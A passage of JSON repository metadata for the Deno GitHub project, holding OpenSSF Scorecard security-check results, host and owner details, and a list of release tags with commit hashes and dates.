patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_